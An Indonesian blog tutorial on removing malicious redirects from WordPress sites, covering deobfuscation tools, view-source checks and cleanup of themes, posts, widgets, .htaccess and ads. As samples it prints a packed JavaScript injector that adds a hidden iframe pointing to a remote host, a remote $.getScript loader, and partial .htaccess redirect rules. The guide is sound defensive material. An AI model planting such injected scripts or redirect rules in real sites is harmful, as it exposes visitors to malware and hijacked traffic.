Cara Menghilangkan Redirect Jahat (Malicious) dari Website WordPress Kita
Redirect adalah membelokkan trafik atau pengunjung kita ke website lainnya. Redirect jahat biasanya digunakan oleh mereka yang ingin iklan di websitenya mendapatkan impresi atau klik yang lebih banyak.
Masalahnya, redirect juga menciptakan celah keamanan yang bisa dimanfaatkan untuk menginstal malware atau software yang merusak komputer pengunjung website kita. Intinya, Redirect harus dihilangkan.
Untuk mencegahnya, kita bisa menggunakan plugin security. Jika Anda belum menggunakannya, sebaiknya Anda gunakan sekarang. Kami merekomendasikan plugin seperti Sucuri, Wordfence atau All in One WPSecurity and Firewall. Yang lainnya juga ada dan silahkan Anda coba sendiri.
Tetapi, ada kemungkinan Anda mencapai halaman ini setelah terkena masalah redirect ini. Jadi, inilah cara untuk menghilangkan redirect tersebut.
Yang harus Anda ingat, code redirect ini bisa masuk berkat program jahat lain yang sudah masuk duluan. Mungkin ada backdoor atau program uploader jahat lainnya.
Sekarang kembali ke redirect.
Sebelum mengubah file apapun di WordPress, selalu kita biasakan untuk membackup seluruh situs ke tempat yang aman.
Redirect dapat dimasukkan dimanapun, di file wordpress bahkan di database. Salah satu contoh code untuk redirect dalam bentuk Javascript:
<script>eval(
function
(p,a,c,k,e,d){e=
function
(c){
return
(c<a?
''
:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if
(!
''
.replace(/^/,String)){
while
(c--){d[e(c)]=k||e(c)}k=[
function
(e){
return
d[e]}];e=
function
(){
return
'\\w+'
};c=1};
while
(c--){
if
(k){p=p.replace(
new
RegExp(
'\\b'
+e(c)+
'\\b'
,
'g'
),k)}}
return
p}(
'i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}'
,41,41,
'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'
.split(
'|'
),0,{}))
</script>
Scrip ini biasanya ditemukan di header.
Scrip seperti ini bisa ditemukan dalam script lain. Ia di-load atau dipanggil oleh script yang lainnya.
$.getScript(
'http://www.[redacted].com/script.js'
,
function
()
Langkah dasarnya,
Temukan file javascript yang melakukan redirect. Tidak semua javasriptc di WordPress kita adalah program jahat. Sebagian besar justru merupakan program inti WordPress.
Bagaimana menemukannya?
Yah, karena sudah terlanjur ditulis, kita lihat saja sekalian caranya (meski sebagian).
Menentukan sebuah script sebagai malicious atau tidak memang sulit, terutama bagi yang belum berpengalaman.
Caranya, buka: http://jsunpack.jeek.org
Disana, kita pastekan code milik kita. Jadi akan terlihat apakah code program tadi kode program jahat atau tidak.
http://jsunpack.jeek.org bisa digunakan untuk berbagai file seperti PDF, Javascript serta HTML.
Apabila javascript disamarkan, akan lebih sulit untuk dibaca code aslinya jika dilihat secara manual.
Sebenarnya, ada juga cara mengeceknya dengan browser kita. Semua program untuk internet, HTML, PHP dan Javascript dikenali browser kita sehingga bisa dieksekusi.
Sekarang, kita ganti script tadi di bagian “eval” menjadi “print.” Jadi, daripada mengeksekusi file tadi, browser kita akan memperlihatkan code programnya.
Ini berlaku juga untuk javascript yang sudah disamarkan.
Bagi Anda yang belum terbiasa, gunakan saja http://jsunpack.jeek.org.
2. Bagi pengguna Google Chrome, masukkan “view-source” dibelakang nama situs yang ingin kita cek. seperti ini: view-source:http://www.namasituskita.com. Kita bisa mengetahui bagian mana dari situs kita yang ada redirectnya.
View-source ini akan membagi code program dalam header, body, widget hingga footer. Script redirect tadi mungkin tampil di suatu bagian, entah body, widget atau footer.
Jika redirect ada di template wordpress kita, gunakan theme editor untuk menghapus script redirect tadi. Atau, kita download dulu , kita bersihkan dan upload kembali.
Redirect Javascript yang dimasukkan dalam page atau post.
Bisa untuk semua page dan semua post atau sebagian.
Javascrip redirectnya akan mirip code diatas.
Cara menghilangkannya harus dengan mengedit halaman post atau page bersangkutan satu persatu.
Atau, bisa kita edit melalui tool databse seperti PhpMyAdmin yang memungkinkan mengedit banyak post atau halaman sekaligus.
Javascript Redirect yang dipasang di Widget dan Htaccess.
Untuk javacsript yang dipasang di widget, ganti saja dengan widget baru. Yang lama dihapus saja.
Untuk Javascript yang dipasang di Htaccess, kita perlu download file htaccess yang ada, bersihkan dan upload kembali.
Contoh script redirect:
RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi
Htaccess bisa digunakan meredirect berdasar browser yang digunakan atau darimana pengunjung kita datang. Misal pengunjung dari Google diredirect ke web mereka.
RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms
Cara membersihkannya, cek program disana dengan website tadi. Jika bersih berarti ok. Jika ada peringatan malicious, buang saja bagian tersebut.
Javascript Redirect dari iklan.
Beberapa iklan yang murah membiarkan atau tidak punya kemampuan menghindari redirect dari pengiklan mereka.Jika kita sulit mengetahui iklan mana yang menimbulkan masalah dan memblokirnya, buang saja iklan ( ad network ) tadi semuanya. Ganti saja dengan iklan lainnya.